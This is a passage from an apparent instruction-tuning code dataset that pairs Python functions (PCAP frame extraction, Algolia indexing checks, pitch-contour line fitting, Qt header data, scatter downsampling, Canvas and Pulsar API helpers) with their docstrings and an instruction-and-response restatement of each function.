mel.eval("evalDeferred buildFileMenu")
# Serialise function into string
script = inspect.getsource(_add_to_filemenu)
script += "\n_add_to_filemenu()"
# If cmds doesn't have any members, we're most likely in an
# uninitialized batch-mode. If it does exist, ensure we
# really aren't in batch mode.
cmds.evalDeferred(script) |
def _run_server(self, multiprocessing):
"""Use server multiprocessing to extract PCAP files."""
if not self._flag_m:
raise UnsupportedCall(f"Extractor(engine={self._exeng})' has no attribute '_run_server'")
if not self._flag_q:
self._flag_q = True
warnings.warn("'Extractor(engine=pipeline)' does not support output; "
f"'fout={self._ofnm}' ignored", AttributeWarning, stacklevel=stacklevel())
self._frnum = 1 # frame number (revised)
self._expkg = multiprocessing # multiprocessing module
self._mpsvc = NotImplemented # multiprocessing server process
self._mpprc = list() # multiprocessing process list
self._mpfdp = collections.defaultdict(multiprocessing.Queue) # multiprocessing file pointer
self._mpmng = multiprocessing.Manager() # multiprocessing manager
self._mpbuf = self._mpmng.dict() # multiprocessing frame dict
self._mpfrm = self._mpmng.list() # multiprocessing frame storage
self._mprsm = self._mpmng.list() # multiprocessing reassembly buffer
self._mpkit = self._mpmng.Namespace() # multiprocessing work kit
self._mpkit.counter = 0 # work count (on duty)
self._mpkit.pool = 1 # work pool (ready)
self._mpkit.eof = False # EOF flag
self._mpkit.trace = None # flow tracer
# preparation
self.record_header()
self._mpfdp[0].put(self._gbhdr.length)
self._mpsvc = multiprocessing.Process(
target=self._server_analyse_frame,
kwargs={'mpfrm': self._mpfrm, 'mprsm': self._mprsm, 'mpbuf': self._mpbuf, 'mpkit': self._mpkit}
)
self._mpsvc.start()
# extraction
while True:
# check EOF
if self._mpkit.eof:
self._update_eof()
break
# check counter
if self._mpkit.pool and self._mpkit.counter < CPU_CNT - 1:
# update file offset
self._ifile.seek(self._mpfdp.pop(self._frnum-1).get(), os.SEEK_SET)
# create worker
# print(self._frnum, 'start')
proc = multiprocessing.Process(
target=self._server_extract_frame,
kwargs={'mpkit': self._mpkit, 'mpbuf': self._mpbuf, 'mpfdp': self._mpfdp[self._frnum]}
)
# update status
self._mpkit.pool -= 1
self._mpkit.counter += 1
# start and record
proc.start()
self._frnum += 1
self._mpprc.append(proc)
# check buffer
if len(self._mpprc) >= CPU_CNT - 1:
[proc.join() for proc in self._mpprc[:-4]]
del self._mpprc[:-4] | Use server multiprocessing to extract PCAP files. | Below is the instruction that describes the task:
### Input:
Use server multiprocessing to extract PCAP files.
### Response:
def _run_server(self, multiprocessing):
"""Use server multiprocessing to extract PCAP files."""
if not self._flag_m:
raise UnsupportedCall(f"Extractor(engine={self._exeng})' has no attribute '_run_server'")
if not self._flag_q:
self._flag_q = True
warnings.warn("'Extractor(engine=pipeline)' does not support output; "
f"'fout={self._ofnm}' ignored", AttributeWarning, stacklevel=stacklevel())
self._frnum = 1 # frame number (revised)
self._expkg = multiprocessing # multiprocessing module
self._mpsvc = NotImplemented # multiprocessing server process
self._mpprc = list() # multiprocessing process list
self._mpfdp = collections.defaultdict(multiprocessing.Queue) # multiprocessing file pointer
self._mpmng = multiprocessing.Manager() # multiprocessing manager
self._mpbuf = self._mpmng.dict() # multiprocessing frame dict
self._mpfrm = self._mpmng.list() # multiprocessing frame storage
self._mprsm = self._mpmng.list() # multiprocessing reassembly buffer
self._mpkit = self._mpmng.Namespace() # multiprocessing work kit
self._mpkit.counter = 0 # work count (on duty)
self._mpkit.pool = 1 # work pool (ready)
self._mpkit.eof = False # EOF flag
self._mpkit.trace = None # flow tracer
# preparation
self.record_header()
self._mpfdp[0].put(self._gbhdr.length)
self._mpsvc = multiprocessing.Process(
target=self._server_analyse_frame,
kwargs={'mpfrm': self._mpfrm, 'mprsm': self._mprsm, 'mpbuf': self._mpbuf, 'mpkit': self._mpkit}
)
self._mpsvc.start()
# extraction
while True:
# check EOF
if self._mpkit.eof:
self._update_eof()
break
# check counter
if self._mpkit.pool and self._mpkit.counter < CPU_CNT - 1:
# update file offset
self._ifile.seek(self._mpfdp.pop(self._frnum-1).get(), os.SEEK_SET)
# create worker
# print(self._frnum, 'start')
proc = multiprocessing.Process(
target=self._server_extract_frame,
kwargs={'mpkit': self._mpkit, 'mpbuf': self._mpbuf, 'mpfdp': self._mpfdp[self._frnum]}
)
# update status
self._mpkit.pool -= 1
self._mpkit.counter += 1
# start and record
proc.start()
self._frnum += 1
self._mpprc.append(proc)
# check buffer
if len(self._mpprc) >= CPU_CNT - 1:
[proc.join() for proc in self._mpprc[:-4]]
del self._mpprc[:-4] |
def _should_really_index(self, instance):
"""Return True if according to should_index the object should be indexed."""
if self._should_index_is_method:
is_method = inspect.ismethod(self.should_index)
try:
count_args = len(inspect.signature(self.should_index).parameters)
except AttributeError:
# noinspection PyDeprecation
count_args = len(inspect.getargspec(self.should_index).args)
if is_method or count_args == 1:
# bound method, call with instance
return self.should_index(instance)
else:
# unbound method, simply call without arguments
return self.should_index()
else:
# property/attribute/Field, evaluate as bool
attr_type = type(self.should_index)
if attr_type is DeferredAttribute:
attr_value = self.should_index.__get__(instance, None)
elif attr_type is str:
attr_value = getattr(instance, self.should_index)
elif attr_type is property:
attr_value = self.should_index.__get__(instance)
else:
raise AlgoliaIndexError('{} should be a boolean attribute or a method that returns a boolean.'.format(
self.should_index))
if type(attr_value) is not bool:
raise AlgoliaIndexError("%s's should_index (%s) should be a boolean" % (
instance.__class__.__name__, self.should_index))
return attr_value | Return True if according to should_index the object should be indexed. | Below is the instruction that describes the task:
### Input:
Return True if according to should_index the object should be indexed.
### Response:
def _should_really_index(self, instance):
"""Return True if according to should_index the object should be indexed."""
if self._should_index_is_method:
is_method = inspect.ismethod(self.should_index)
try:
count_args = len(inspect.signature(self.should_index).parameters)
except AttributeError:
# noinspection PyDeprecation
count_args = len(inspect.getargspec(self.should_index).args)
if is_method or count_args == 1:
# bound method, call with instance
return self.should_index(instance)
else:
# unbound method, simply call without arguments
return self.should_index()
else:
# property/attribute/Field, evaluate as bool
attr_type = type(self.should_index)
if attr_type is DeferredAttribute:
attr_value = self.should_index.__get__(instance, None)
elif attr_type is str:
attr_value = getattr(instance, self.should_index)
elif attr_type is property:
attr_value = self.should_index.__get__(instance)
else:
raise AlgoliaIndexError('{} should be a boolean attribute or a method that returns a boolean.'.format(
self.should_index))
if type(attr_value) is not bool:
raise AlgoliaIndexError("%s's should_index (%s) should be a boolean" % (
instance.__class__.__name__, self.should_index))
return attr_value |
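A framework-free illustration of the three spellings the dispatch above accepts (attribute name, property, method); the Django/Algolia specifics (DeferredAttribute, AlgoliaIndexError) are deliberately left out, so this is not the library's actual code path.
class Product:
    is_public = True                    # referenced by name: should_index = 'is_public'
    @property
    def visible(self):                  # property object: should_index = Product.visible
        return self.is_public
    def publishable(self):              # plain function: should_index = Product.publishable
        return self.is_public
p = Product()
print(getattr(p, 'is_public'))          # str case: simple attribute lookup -> True
print(Product.visible.__get__(p))       # property case: descriptor evaluated -> True
print(Product.publishable(p))           # unbound case: called with the instance -> True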
def fit_lines(self, window=1500, break_thresh=1500):
"""
Fits lines to pitch contours.
:param window: size of each chunk to which linear equation is to be fit (in milliseconds).
To keep it simple, hop is chosen to be one third of the window.
:param break_thresh: If there is silence beyond this limit (in milliseconds),
the contour will be broken there into two so that we don't fit a line over and
including the silent region.
"""
window /= 1000
hop = window/3
break_thresh /= 1000
#cut the whole song into pieces if there are gaps more than break_thresh seconds
i = 0
break_indices = []
count = 0
while i < len(self.pitch):
if self.pitch[i] == -10000:
count = 1
start_index = i
while i < len(self.pitch) and self.pitch[i] == -10000:
count += 1
i += 1
end_index = i-1
if self.timestamps[end_index]-self.timestamps[start_index] >= break_thresh:
break_indices.append([start_index, end_index])
i += 1
break_indices = np.array(break_indices)
#In creating the data blocks which are not silences, note that we
# take complimentary break indices. i.e., if [[s1, e1], [s2, e2] ...]
# is break_indices, we take e1-s2, e2-s3 chunks and build data blocks
data_blocks = []
if len(break_indices) == 0:
t_pitch = self.pitch.reshape(len(self.pitch), 1)
t_timestamps = self.timestamps.reshape(len(self.timestamps), 1)
data_blocks = [np.append(t_timestamps, t_pitch, axis=1)]
else:
if break_indices[0, 0] != 0:
t_pitch = self.pitch[:break_indices[0, 0]]
t_pitch = t_pitch.reshape(len(t_pitch), 1)
t_timestamps = self.timestamps[:break_indices[0, 0]]
t_timestamps = t_timestamps.reshape(len(t_timestamps), 1)
data_blocks.append(np.append(t_timestamps, t_pitch, axis=1))
block_start = break_indices[0, 1]
for i in xrange(1, len(break_indices)):
block_end = break_indices[i, 0]
t_pitch = self.pitch[block_start:block_end]
t_pitch = t_pitch.reshape(len(t_pitch), 1)
t_timestamps = self.timestamps[block_start:block_end]
t_timestamps = t_timestamps.reshape(len(t_timestamps), 1)
data_blocks.append(np.append(t_timestamps, t_pitch, axis=1))
block_start = break_indices[i, 1]
if block_start != len(self.pitch)-1:
t_pitch = self.pitch[block_start:]
t_pitch = t_pitch.reshape(len(t_pitch), 1)
t_timestamps = self.timestamps[block_start:]
t_timestamps = t_timestamps.reshape(len(t_timestamps), 1)
data_blocks.append(np.append(t_timestamps, t_pitch, axis=1))
label_start_offset = (window-hop)/2
label_end_offset = label_start_offset+hop
#dataNew = np.zeros_like(data)
#dataNew[:, 0] = data[:, 0]
data_new = np.array([[0, 0]])
for data in data_blocks:
start_index = 0
while start_index < len(data)-1:
end_index = utils.find_nearest_index(data[:, 0], data[start_index][0]+window)
segment = data[start_index:end_index]
if len(segment) == 0:
start_index = utils.find_nearest_index(data[:, 0], data[start_index, 0]+hop)
continue
segment_clean = np.delete(segment, np.where(segment[:, 1] == -10000), axis=0)
if len(segment_clean) == 0:
#After splitting into blocks, this loop better not come into play
#raise ValueError("This part of the block is absolute silence! Make sure block_thresh >= window!")
start_index = utils.find_nearest_index(data[:, 0], data[start_index, 0]+hop)
continue
n_clean = len(segment_clean)
x_clean = np.matrix(segment_clean[:, 0]).reshape(n_clean, 1)
y_clean = np.matrix(segment_clean[:, 1]).reshape(n_clean, 1)
#return [x_clean, y_clean]
theta = utils.normal_equation(x_clean, y_clean)
#determine the start and end of the segment to be labelled
label_start_index = utils.find_nearest_index(x_clean, data[start_index, 0]+label_start_offset)
label_end_index = utils.find_nearest_index(x_clean, data[start_index, 0]+label_end_offset)
x_clean = x_clean[label_start_index:label_end_index]
#return x_clean
x_clean = np.insert(x_clean, 0, np.ones(len(x_clean)), axis=1)
newy = x_clean*theta
result = np.append(x_clean[:, 1], newy, axis=1)
data_new = np.append(data_new, result, axis=0)
start_index = utils.find_nearest_index(data[:, 0], data[start_index, 0]+hop)
return [data_new[:, 0], data_new[:, 1]] | Fits lines to pitch contours.
:param window: size of each chunk to which linear equation is to be fit (in milliseconds).
To keep it simple, hop is chosen to be one third of the window.
:param break_thresh: If there is silence beyond this limit (in milliseconds),
the contour will be broken there into two so that we don't fit a line over and
including the silent region. | Below is the instruction that describes the task:
### Input:
Fits lines to pitch contours.
:param window: size of each chunk to which linear equation is to be fit (in milliseconds).
To keep it simple, hop is chosen to be one third of the window.
:param break_thresh: If there is silence beyond this limit (in milliseconds),
the contour will be broken there into two so that we don't fit a line over and
including the silent region.
### Response:
def fit_lines(self, window=1500, break_thresh=1500):
"""
Fits lines to pitch contours.
:param window: size of each chunk to which linear equation is to be fit (in milliseconds).
To keep it simple, hop is chosen to be one third of the window.
:param break_thresh: If there is silence beyond this limit (in milliseconds),
the contour will be broken there into two so that we don't fit a line over and
including the silent region.
"""
window /= 1000
hop = window/3
break_thresh /= 1000
#cut the whole song into pieces if there are gaps more than break_thresh seconds
i = 0
break_indices = []
count = 0
while i < len(self.pitch):
if self.pitch[i] == -10000:
count = 1
start_index = i
while i < len(self.pitch) and self.pitch[i] == -10000:
count += 1
i += 1
end_index = i-1
if self.timestamps[end_index]-self.timestamps[start_index] >= break_thresh:
break_indices.append([start_index, end_index])
i += 1
break_indices = np.array(break_indices)
#In creating the data blocks which are not silences, note that we
# take complimentary break indices. i.e., if [[s1, e1], [s2, e2] ...]
# is break_indices, we take e1-s2, e2-s3 chunks and build data blocks
data_blocks = []
if len(break_indices) == 0:
t_pitch = self.pitch.reshape(len(self.pitch), 1)
t_timestamps = self.timestamps.reshape(len(self.timestamps), 1)
data_blocks = [np.append(t_timestamps, t_pitch, axis=1)]
else:
if break_indices[0, 0] != 0:
t_pitch = self.pitch[:break_indices[0, 0]]
t_pitch = t_pitch.reshape(len(t_pitch), 1)
t_timestamps = self.timestamps[:break_indices[0, 0]]
t_timestamps = t_timestamps.reshape(len(t_timestamps), 1)
data_blocks.append(np.append(t_timestamps, t_pitch, axis=1))
block_start = break_indices[0, 1]
for i in xrange(1, len(break_indices)):
block_end = break_indices[i, 0]
t_pitch = self.pitch[block_start:block_end]
t_pitch = t_pitch.reshape(len(t_pitch), 1)
t_timestamps = self.timestamps[block_start:block_end]
t_timestamps = t_timestamps.reshape(len(t_timestamps), 1)
data_blocks.append(np.append(t_timestamps, t_pitch, axis=1))
block_start = break_indices[i, 1]
if block_start != len(self.pitch)-1:
t_pitch = self.pitch[block_start:]
t_pitch = t_pitch.reshape(len(t_pitch), 1)
t_timestamps = self.timestamps[block_start:]
t_timestamps = t_timestamps.reshape(len(t_timestamps), 1)
data_blocks.append(np.append(t_timestamps, t_pitch, axis=1))
label_start_offset = (window-hop)/2
label_end_offset = label_start_offset+hop
#dataNew = np.zeros_like(data)
#dataNew[:, 0] = data[:, 0]
data_new = np.array([[0, 0]])
for data in data_blocks:
start_index = 0
while start_index < len(data)-1:
end_index = utils.find_nearest_index(data[:, 0], data[start_index][0]+window)
segment = data[start_index:end_index]
if len(segment) == 0:
start_index = utils.find_nearest_index(data[:, 0], data[start_index, 0]+hop)
continue
segment_clean = np.delete(segment, np.where(segment[:, 1] == -10000), axis=0)
if len(segment_clean) == 0:
#After splitting into blocks, this loop better not come into play
#raise ValueError("This part of the block is absolute silence! Make sure block_thresh >= window!")
start_index = utils.find_nearest_index(data[:, 0], data[start_index, 0]+hop)
continue
n_clean = len(segment_clean)
x_clean = np.matrix(segment_clean[:, 0]).reshape(n_clean, 1)
y_clean = np.matrix(segment_clean[:, 1]).reshape(n_clean, 1)
#return [x_clean, y_clean]
theta = utils.normal_equation(x_clean, y_clean)
#determine the start and end of the segment to be labelled
label_start_index = utils.find_nearest_index(x_clean, data[start_index, 0]+label_start_offset)
label_end_index = utils.find_nearest_index(x_clean, data[start_index, 0]+label_end_offset)
x_clean = x_clean[label_start_index:label_end_index]
#return x_clean
x_clean = np.insert(x_clean, 0, np.ones(len(x_clean)), axis=1)
newy = x_clean*theta
result = np.append(x_clean[:, 1], newy, axis=1)
data_new = np.append(data_new, result, axis=0)
start_index = utils.find_nearest_index(data[:, 0], data[start_index, 0]+hop)
return [data_new[:, 0], data_new[:, 1]] |
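A hypothetical usage sketch with synthetic data; the PitchContour constructor name is invented here, since the method only tells us the surrounding object exposes pitch and timestamps arrays (and the package's utils helpers).
import numpy as np
timestamps = np.arange(0.0, 10.0, 0.01)                     # 10 s sampled every 10 ms
pitch = 220.0 + 5.0 * np.sin(2 * np.pi * timestamps)        # synthetic contour in Hz
pitch[300:500] = -10000                                     # a 2 s silent gap marked with -10000
contour = PitchContour(pitch=pitch, timestamps=timestamps)  # hypothetical constructor
xs, ys = contour.fit_lines(window=1500, break_thresh=1500)  # piecewise-linear fit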
def headerData(self, section, orientation, role=Qt.DisplayRole):
"""Qt Override."""
if role == Qt.TextAlignmentRole:
if orientation == Qt.Horizontal:
return to_qvariant(int(Qt.AlignHCenter | Qt.AlignVCenter))
return to_qvariant(int(Qt.AlignRight | Qt.AlignVCenter))
if role != Qt.DisplayRole:
return to_qvariant()
if orientation == Qt.Horizontal:
if section == CONTEXT:
return to_qvariant(_("Context"))
elif section == NAME:
return to_qvariant(_("Name"))
elif section == SEQUENCE:
return to_qvariant(_("Shortcut"))
elif section == SEARCH_SCORE:
return to_qvariant(_("Score"))
return to_qvariant() | Qt Override. | Below is the instruction that describes the task:
### Input:
Qt Override.
### Response:
def headerData(self, section, orientation, role=Qt.DisplayRole):
"""Qt Override."""
if role == Qt.TextAlignmentRole:
if orientation == Qt.Horizontal:
return to_qvariant(int(Qt.AlignHCenter | Qt.AlignVCenter))
return to_qvariant(int(Qt.AlignRight | Qt.AlignVCenter))
if role != Qt.DisplayRole:
return to_qvariant()
if orientation == Qt.Horizontal:
if section == CONTEXT:
return to_qvariant(_("Context"))
elif section == NAME:
return to_qvariant(_("Name"))
elif section == SEQUENCE:
return to_qvariant(_("Shortcut"))
elif section == SEARCH_SCORE:
return to_qvariant(_("Score"))
return to_qvariant() |
def downsample_grid(a, b, samples, ret_idx=False):
"""Content-based downsampling for faster visualization
The arrays `a` and `b` make up a 2D scatter plot with high
and low density values. This method takes out points at
indices with high density.
Parameters
----------
a, b: 1d ndarrays
The input arrays to downsample
samples: int
The desired number of samples
remove_invalid: bool
Remove nan and inf values before downsampling
ret_idx: bool
Also return a boolean array that corresponds to the
downsampled indices in `a` and `b`.
Returns
-------
dsa, dsb: 1d ndarrays of shape (samples,)
The arrays `a` and `b` downsampled by evenly selecting
points and pseudo-randomly adding or removing points
to match `samples`.
idx: 1d boolean array with same shape as `a`
Only returned if `ret_idx` is True.
A boolean array such that `a[idx] == dsa`
"""
# fixed random state for this method
rs = np.random.RandomState(seed=47).get_state()
samples = int(samples)
if samples and samples < a.size:
# The events to keep
keep = np.zeros_like(a, dtype=bool)
# 1. Produce evenly distributed samples
# Choosing grid-size:
# - large numbers tend to show actual structures of the sample,
# which is not desired for plotting
# - small numbers tend to result in too few samples and,
# in order to reach the desired samples, the data must be
# upsampled again.
# 300 is about the size of the plot in marker sizes and yields
# good results.
grid_size = 300
xpx = norm(a, a, b) * grid_size
ypx = norm(b, b, a) * grid_size
# The events on the grid to process
toproc = np.ones((grid_size, grid_size), dtype=bool)
for ii in range(xpx.size):
xi = xpx[ii]
yi = ypx[ii]
# filter for overlapping events
if valid(xi, yi) and toproc[int(xi-1), int(yi-1)]:
toproc[int(xi-1), int(yi-1)] = False
# include event
keep[ii] = True
# 2. Make sure that we reach `samples` by adding or
# removing events.
diff = np.sum(keep) - samples
if diff > 0:
# Too many samples
rem_indices = np.where(keep)[0]
np.random.set_state(rs)
rem = np.random.choice(rem_indices,
size=diff,
replace=False)
keep[rem] = False
elif diff < 0:
# Not enough samples
add_indices = np.where(~keep)[0]
np.random.set_state(rs)
add = np.random.choice(add_indices,
size=abs(diff),
replace=False)
keep[add] = True
assert np.sum(keep) == samples, "sanity check"
asd = a[keep]
bsd = b[keep]
assert np.allclose(a[keep], asd, equal_nan=True), "sanity check"
assert np.allclose(b[keep], bsd, equal_nan=True), "sanity check"
else:
keep = np.ones_like(a, dtype=bool)
asd = a
bsd = b
if ret_idx:
return asd, bsd, keep
else:
return asd, bsd | Content-based downsampling for faster visualization
The arrays `a` and `b` make up a 2D scatter plot with high
and low density values. This method takes out points at
indices with high density.
Parameters
----------
a, b: 1d ndarrays
The input arrays to downsample
samples: int
The desired number of samples
remove_invalid: bool
Remove nan and inf values before downsampling
ret_idx: bool
Also return a boolean array that corresponds to the
downsampled indices in `a` and `b`.
Returns
-------
dsa, dsb: 1d ndarrays of shape (samples,)
The arrays `a` and `b` downsampled by evenly selecting
points and pseudo-randomly adding or removing points
to match `samples`.
idx: 1d boolean array with same shape as `a`
Only returned if `ret_idx` is True.
A boolean array such that `a[idx] == dsa` | Below is the instruction that describes the task:
### Input:
Content-based downsampling for faster visualization
The arrays `a` and `b` make up a 2D scatter plot with high
and low density values. This method takes out points at
indices with high density.
Parameters
----------
a, b: 1d ndarrays
The input arrays to downsample
samples: int
The desired number of samples
remove_invalid: bool
Remove nan and inf values before downsampling
ret_idx: bool
Also return a boolean array that corresponds to the
downsampled indices in `a` and `b`.
Returns
-------
dsa, dsb: 1d ndarrays of shape (samples,)
The arrays `a` and `b` downsampled by evenly selecting
points and pseudo-randomly adding or removing points
to match `samples`.
idx: 1d boolean array with same shape as `a`
Only returned if `ret_idx` is True.
A boolean array such that `a[idx] == dsa`
### Response:
def downsample_grid(a, b, samples, ret_idx=False):
"""Content-based downsampling for faster visualization
The arrays `a` and `b` make up a 2D scatter plot with high
and low density values. This method takes out points at
indices with high density.
Parameters
----------
a, b: 1d ndarrays
The input arrays to downsample
samples: int
The desired number of samples
remove_invalid: bool
Remove nan and inf values before downsampling
ret_idx: bool
Also return a boolean array that corresponds to the
downsampled indices in `a` and `b`.
Returns
-------
dsa, dsb: 1d ndarrays of shape (samples,)
The arrays `a` and `b` downsampled by evenly selecting
points and pseudo-randomly adding or removing points
to match `samples`.
idx: 1d boolean array with same shape as `a`
Only returned if `ret_idx` is True.
A boolean array such that `a[idx] == dsa`
"""
# fixed random state for this method
rs = np.random.RandomState(seed=47).get_state()
samples = int(samples)
if samples and samples < a.size:
# The events to keep
keep = np.zeros_like(a, dtype=bool)
# 1. Produce evenly distributed samples
# Choosing grid-size:
# - large numbers tend to show actual structures of the sample,
# which is not desired for plotting
# - small numbers tend will not result in too few samples and,
# in order to reach the desired samples, the data must be
# upsampled again.
# 300 is about the size of the plot in marker sizes and yields
# good results.
grid_size = 300
xpx = norm(a, a, b) * grid_size
ypx = norm(b, b, a) * grid_size
# The events on the grid to process
toproc = np.ones((grid_size, grid_size), dtype=bool)
for ii in range(xpx.size):
xi = xpx[ii]
yi = ypx[ii]
# filter for overlapping events
if valid(xi, yi) and toproc[int(xi-1), int(yi-1)]:
toproc[int(xi-1), int(yi-1)] = False
# include event
keep[ii] = True
# 2. Make sure that we reach `samples` by adding or
# removing events.
diff = np.sum(keep) - samples
if diff > 0:
# Too many samples
rem_indices = np.where(keep)[0]
np.random.set_state(rs)
rem = np.random.choice(rem_indices,
size=diff,
replace=False)
keep[rem] = False
elif diff < 0:
# Not enough samples
add_indices = np.where(~keep)[0]
np.random.set_state(rs)
add = np.random.choice(add_indices,
size=abs(diff),
replace=False)
keep[add] = True
assert np.sum(keep) == samples, "sanity check"
asd = a[keep]
bsd = b[keep]
assert np.allclose(a[keep], asd, equal_nan=True), "sanity check"
assert np.allclose(b[keep], bsd, equal_nan=True), "sanity check"
else:
keep = np.ones_like(a, dtype=bool)
asd = a
bsd = b
if ret_idx:
return asd, bsd, keep
else:
return asd, bsd |
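A short usage sketch on synthetic data; it assumes the module-level norm and valid helpers that the function calls are importable alongside it.
import numpy as np
rng = np.random.RandomState(0)
a = rng.normal(size=20000)                      # dense, correlated scatter data
b = a + rng.normal(scale=0.1, size=20000)
dsa, dsb, idx = downsample_grid(a, b, samples=1000, ret_idx=True)
print(dsa.size, int(idx.sum()))                 # 1000 1000 -- idx marks the kept events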
def upload_data(job, master_ip, inputs, hdfs_name, upload_name, spark_on_toil):
"""
Upload file hdfsName from hdfs to s3
"""
if mock_mode():
truncate_file(master_ip, hdfs_name, spark_on_toil)
log.info("Uploading output BAM %s to %s.", hdfs_name, upload_name)
call_conductor(job, master_ip, hdfs_name, upload_name, memory=inputs.memory)
remove_file(master_ip, hdfs_name, spark_on_toil) | Upload file hdfsName from hdfs to s3 | Below is the instruction that describes the task:
### Input:
Upload file hdfsName from hdfs to s3
### Response:
def upload_data(job, master_ip, inputs, hdfs_name, upload_name, spark_on_toil):
"""
Upload file hdfsName from hdfs to s3
"""
if mock_mode():
truncate_file(master_ip, hdfs_name, spark_on_toil)
log.info("Uploading output BAM %s to %s.", hdfs_name, upload_name)
call_conductor(job, master_ip, hdfs_name, upload_name, memory=inputs.memory)
remove_file(master_ip, hdfs_name, spark_on_toil) |
def removeChildren(self, children):
'''
removeChildren - Remove multiple child AdvancedTags.
@see removeChild
@return list<AdvancedTag/None> - A list of all tags removed in same order as passed.
Item is "None" if it was not attached to this node, and thus was not removed.
'''
ret = []
for child in children:
ret.append( self.removeChild(child) )
return ret | removeChildren - Remove multiple child AdvancedTags.
@see removeChild
@return list<AdvancedTag/None> - A list of all tags removed in same order as passed.
Item is "None" if it was not attached to this node, and thus was not removed. | Below is the the instruction that describes the task:
### Input:
removeChildren - Remove multiple child AdvancedTags.
@see removeChild
@return list<AdvancedTag/None> - A list of all tags removed in same order as passed.
Item is "None" if it was not attached to this node, and thus was not removed.
### Response:
def removeChildren(self, children):
'''
removeChildren - Remove multiple child AdvancedTags.
@see removeChild
@return list<AdvancedTag/None> - A list of all tags removed in same order as passed.
Item is "None" if it was not attached to this node, and thus was not removed.
'''
ret = []
for child in children:
ret.append( self.removeChild(child) )
return ret |
def single_input(self, body):
"""single_input: NEWLINE | simple_stmt | compound_stmt NEWLINE"""
loc = None
if body != []:
loc = body[0].loc
return ast.Interactive(body=body, loc=loc) | single_input: NEWLINE | simple_stmt | compound_stmt NEWLINE | Below is the instruction that describes the task:
### Input:
single_input: NEWLINE | simple_stmt | compound_stmt NEWLINE
### Response:
def single_input(self, body):
"""single_input: NEWLINE | simple_stmt | compound_stmt NEWLINE"""
loc = None
if body != []:
loc = body[0].loc
return ast.Interactive(body=body, loc=loc) |
def rcts(self, command, *args, **kwargs):
'''General function for applying a rolling R function to a timeserie'''
cls = self.__class__
name = kwargs.pop('name','')
date = kwargs.pop('date',None)
data = kwargs.pop('data',None)
kwargs.pop('bycolumn',None)
ts = cls(name=name,date=date,data=data)
ts._ts = self.rc(command, *args, **kwargs)
return ts | General function for applying a rolling R function to a timeserie | Below is the instruction that describes the task:
### Input:
General function for applying a rolling R function to a timeserie
### Response:
def rcts(self, command, *args, **kwargs):
'''General function for applying a rolling R function to a timeserie'''
cls = self.__class__
name = kwargs.pop('name','')
date = kwargs.pop('date',None)
data = kwargs.pop('data',None)
kwargs.pop('bycolumn',None)
ts = cls(name=name,date=date,data=data)
ts._ts = self.rc(command, *args, **kwargs)
return ts |
def verify_path(self, mold_id_path):
"""
Lookup and verify path.
"""
try:
path = self.lookup_path(mold_id_path)
if not exists(path):
raise KeyError
except KeyError:
raise_os_error(ENOENT)
return path | Lookup and verify path. | Below is the instruction that describes the task:
### Input:
Lookup and verify path.
### Response:
def verify_path(self, mold_id_path):
"""
Lookup and verify path.
"""
try:
path = self.lookup_path(mold_id_path)
if not exists(path):
raise KeyError
except KeyError:
raise_os_error(ENOENT)
return path |
def fetch_output(self, path, name, working_directory, action_type, output_type):
"""
Fetch (transfer, copy, etc...) an output from the remote Pulsar server.
**Parameters**
path : str
Local path of the dataset.
name : str
Remote name of file (i.e. path relative to remote staging output
or working directory).
working_directory : str
Local working_directory for the job.
action_type : str
Where to find file on Pulsar (output_workdir or output). legacy is also
an option in this case Pulsar is asked for location - this will only be
used if targetting an older Pulsar server that didn't return statuses
allowing this to be inferred.
"""
if output_type in ['output_workdir', 'output_metadata']:
self._populate_output_path(name, path, action_type, output_type)
elif output_type == 'output':
self._fetch_output(path=path, name=name, action_type=action_type)
else:
raise Exception("Unknown output_type %s" % output_type) | Fetch (transfer, copy, etc...) an output from the remote Pulsar server.
**Parameters**
path : str
Local path of the dataset.
name : str
Remote name of file (i.e. path relative to remote staging output
or working directory).
working_directory : str
Local working_directory for the job.
action_type : str
Where to find file on Pulsar (output_workdir or output). legacy is also
an option in this case Pulsar is asked for location - this will only be
used if targeting an older Pulsar server that didn't return statuses
allowing this to be inferred. | Below is the instruction that describes the task:
### Input:
Fetch (transfer, copy, etc...) an output from the remote Pulsar server.
**Parameters**
path : str
Local path of the dataset.
name : str
Remote name of file (i.e. path relative to remote staging output
or working directory).
working_directory : str
Local working_directory for the job.
action_type : str
Where to find file on Pulsar (output_workdir or output). legacy is also
an option in this case Pulsar is asked for location - this will only be
used if targeting an older Pulsar server that didn't return statuses
allowing this to be inferred.
### Response:
def fetch_output(self, path, name, working_directory, action_type, output_type):
"""
Fetch (transfer, copy, etc...) an output from the remote Pulsar server.
**Parameters**
path : str
Local path of the dataset.
name : str
Remote name of file (i.e. path relative to remote staging output
or working directory).
working_directory : str
Local working_directory for the job.
action_type : str
Where to find file on Pulsar (output_workdir or output). legacy is also
an option in this case Pulsar is asked for location - this will only be
used if targeting an older Pulsar server that didn't return statuses
allowing this to be inferred.
"""
if output_type in ['output_workdir', 'output_metadata']:
self._populate_output_path(name, path, action_type, output_type)
elif output_type == 'output':
self._fetch_output(path=path, name=name, action_type=action_type)
else:
raise Exception("Unknown output_type %s" % output_type) |
def show_page_courses(self, url, course_id):
"""
Show page.
Retrieve the content of a wiki page
"""
path = {}
data = {}
params = {}
# REQUIRED - PATH - course_id
"""ID"""
path["course_id"] = course_id
# REQUIRED - PATH - url
"""ID"""
path["url"] = url
self.logger.debug("GET /api/v1/courses/{course_id}/pages/{url} with query params: {params} and form data: {data}".format(params=params, data=data, **path))
return self.generic_request("GET", "/api/v1/courses/{course_id}/pages/{url}".format(**path), data=data, params=params, single_item=True) | Show page.
Retrieve the content of a wiki page | Below is the instruction that describes the task:
### Input:
Show page.
Retrieve the content of a wiki page
### Response:
def show_page_courses(self, url, course_id):
"""
Show page.
Retrieve the content of a wiki page
"""
path = {}
data = {}
params = {}
# REQUIRED - PATH - course_id
"""ID"""
path["course_id"] = course_id
# REQUIRED - PATH - url
"""ID"""
path["url"] = url
self.logger.debug("GET /api/v1/courses/{course_id}/pages/{url} with query params: {params} and form data: {data}".format(params=params, data=data, **path))
return self.generic_request("GET", "/api/v1/courses/{course_id}/pages/{url}".format(**path), data=data, params=params, single_item=True) |
def put_edit(self, f, *args, **kwds):
"""
Defer an edit to run on the EditQueue.
:param callable f: The function to be called
:param tuple args: Positional arguments to the function
:param tuple kwds: Keyword arguments to the function
:throws queue.Full: if the queue is full
"""
self.put_nowait(functools.partial(f, *args, **kwds)) | Defer an edit to run on the EditQueue.
:param callable f: The function to be called
:param tuple args: Positional arguments to the function
:param tuple kwds: Keyword arguments to the function
:throws queue.Full: if the queue is full | Below is the the instruction that describes the task:
### Input:
